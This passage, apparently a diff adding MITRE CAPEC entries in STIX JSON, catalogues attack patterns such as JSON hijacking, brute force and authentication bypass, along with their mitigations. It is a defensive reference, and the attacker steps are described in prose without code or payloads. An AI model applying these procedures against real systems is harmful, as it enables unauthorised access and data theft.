"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b4508bd0-d52b-4b82-b35c-ba342a6d024b", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly.", + "id": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-110-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0ab5963-a4b2-4dab-aeee-924ec742c54a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58d0cbaa-2fda-4d1c-bbe1-8405dc79acbb", + "target_ref": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.", + "external_references": [ + { + "external_id": "CAPEC-111", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/111.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + } + ], + "id": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "JSON Hijacking (aka JavaScript Hijacking)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when they receive it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail.\n When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand How to Request JSON Responses from the Target System: An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker.

    2. Techniques
    An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit.

Experiment

  1. [Craft a malicious website]The attacker crafts a malicious website to which they plan to lure the victim who is using the vulnerable target system. The malicious website does two things:\n \n 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest).\n 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker.\n \n This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain.\n

Exploit

  1. Launch JSON hijack: An attacker lures the victim to the malicious website or leverages other means to get their malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in.

    2. Techniques
    An attacker employs a myriad of standard techniques to get the victim to visit their malicious site or by some other means get the attackers' malicious code executing in the victim's browser.
", + "x_capec_extended_description": "\n An attacker gets the victim to visit their malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server.\n There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "JSON is used as a transport mechanism between the client and the server", + "The target server cannot differentiate real requests from forged requests", + "The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Once this attack pattern is developed and understood, creating an exploit is not very complex.The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce.", + "id": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ac6c9-0bf4-4b2b-80c8-407013b2e9fa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f87b1daf-edf4-4fb0-bc8e-a042d0c2d43e", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags).", + "id": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b7db0b5-d1c4-48fa-aef5-d966935fecc5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--00b17d50-1313-4019-81d7-ac8cfda42439", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session.", + "id": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce344fe2-2f03-491f-a465-a5e7578ca3aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9085eee9-2f7e-4b3b-bbea-dbc4f0d0044f", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario.", + "id": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-111-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ccdf4c19-dc2a-46b4-b444-b78da5d0300f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec731c48-7174-45e1-85e5-b82150c25e2f", + "target_ref": "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset.", + "external_references": [ + { + "external_id": "CAPEC-112", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Brute Force", + "external_id": "T1110", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110" + }, + { + "description": "Brute Force", + "external_id": "11", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Brute-Force" + }, + { + "description": "Brute force attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Brute_force_attack" + } + ], + "id": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Brute Force", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine secret testing procedure: Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted.

    2. Techniques
    Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded.

  2. Reduce search space: Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced.

    3. Techniques
    If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.)
    If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space.
    If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas.
    Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret.

  3. Expand victory conditions: It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value.

Exploit

  1. Gather information so attack can be performed independently.: If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords).

", + "x_capec_extended_description": "\n Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_prerequisites": [ + "The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures." + ], + "x_capec_skills_required": { + "Low": "The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space.", + "id": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc237ef1-9283-4680-b8d0-9ef4a0cf8147", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6863b358-1e48-48e0-b084-56c5cc603fb4", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secret space that is well known and with no known patterns that may reduce functional size.", + "id": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c266ae48-e3db-42b8-b3ce-57936242fa62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aaaca7bd-c8e3-477f-8457-0dd2fa58b41c", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext.", + "id": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-112-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--720b2d97-9125-482c-b7b3-c17acce30c06", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4cce5adb-bd38-46a1-b756-9c85290ad8e7", + "target_ref": "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way.", + "external_references": [ + { + "external_id": "CAPEC-113", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-1192", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1192.html" + } + ], + "id": "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Interface Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary may make a request to an application that leverages a non-standard API that is known to incorrectly validate its data and thus it may be manipulated by supplying metacharacters or alternate encodings as input, resulting in any number of injection flaws, including SQL injection, cross-site scripting, or command execution.", + "API methods not intended for production, such as debugging or testing APIs, may not be disabled when deploying in a production environment. As a result, dangerous functionality can be exposed within the production environment, which an adversary can leverage to execute additional attacks.", + "SoC components contain insufficient identifiers, which allows an adversary to reset the device at will or read sensitive data from the device." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "attack-pattern--f90601a6-9e18-4e96-804d-01a4f4ea30f2", + "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5" + ], + "x_capec_prerequisites": [ + "The target system must expose interface functionality in a manner that can be discovered and manipulated by an adversary. This may require reverse engineering the interface or decrypting/de-obfuscating client-server exchanges." + ], + "x_capec_resources_required": [ + "The requirements vary depending upon the nature of the interface. For example, application-layer APIs related to the processing of the HTTP protocol may require one or more of the following: an Adversary-In-The-Middle (CAPEC-94) proxy, a web browser, or a programming/scripting language." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.", + "external_references": [ + { + "external_id": "CAPEC-114", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-1244", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1244.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n This attack may exploit assumptions made by the target's authentication procedures, such as assumptions regarding trust relationships or assumptions regarding the generation of secret values. This attack differs from Authentication Bypass attacks in that Authentication Abuse allows the attacker to be certified as a valid user through illegitimate means, while Authentication Bypass allows the user to access protected material without ever being certified as an authenticated user. This attack does not rely on prior sessions established by successfully authenticating users, as relied upon for the \"Exploitation of Session Variables, Resource IDs and other Trusted Credentials\" attack patterns.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc. which is flawed in some way." + ], + "x_capec_resources_required": [ + "A client application, command-line access to a binary, or scripting language capable of interacting with the authentication mechanism." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.", + "external_references": [ + { + "external_id": "CAPEC-115", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/115.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-598", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/04-Testing_for_Bypassing_Authentication_Schema.html" + } + ], + "id": "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Authentication Bypass", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n This refers to an attacker gaining access equivalent to an authenticated user without ever going through an authentication procedure. This is usually the result of the attacker using an unexpected access procedure that does not go through the proper checkpoints where authentication should occur. For example, a web site might assume that all users will click through a given link in order to get to secure material and simply authenticate everyone that clicks the link. However, an attacker might be able to reach secured web content by explicitly entering the path to the content rather than clicking through the authentication link, thereby avoiding the check entirely. This attack pattern differs from other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than faking authentication by exploiting flaws or by stealing credentials from legitimate users.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29", + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6" + ], + "x_capec_prerequisites": [ + "An authentication mechanism or subsystem implementing some form of authentication such as passwords, digest authentication, security certificates, etc." + ], + "x_capec_resources_required": [ + "A client application, such as a web browser, or a scripting language capable of interacting with the target." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes.", + "external_references": [ + { + "external_id": "CAPEC-116", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + } + ], + "id": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Excavation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_extended_description": "\n This is achieved by exploring the target via ordinary interactions for the purpose of gathering intelligence about the target, or by sending data that is syntactically invalid or non-standard in an attempt to produce a response that contains the desired data. As a result of these interactions, the adversary is able to obtain information from the target that aids the attacker in making inferences about its security, configuration, or potential vulnerabilities. Examplar exchanges with the target may trigger unhandled exceptions or verbose error messages that reveal information like stack traces, configuration information, path information, or database design. This type of attack also includes the manipulation of query strings in a URI to produce invalid SQL queries, or by trying alternative path values in the hope that the server will return useful information.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + 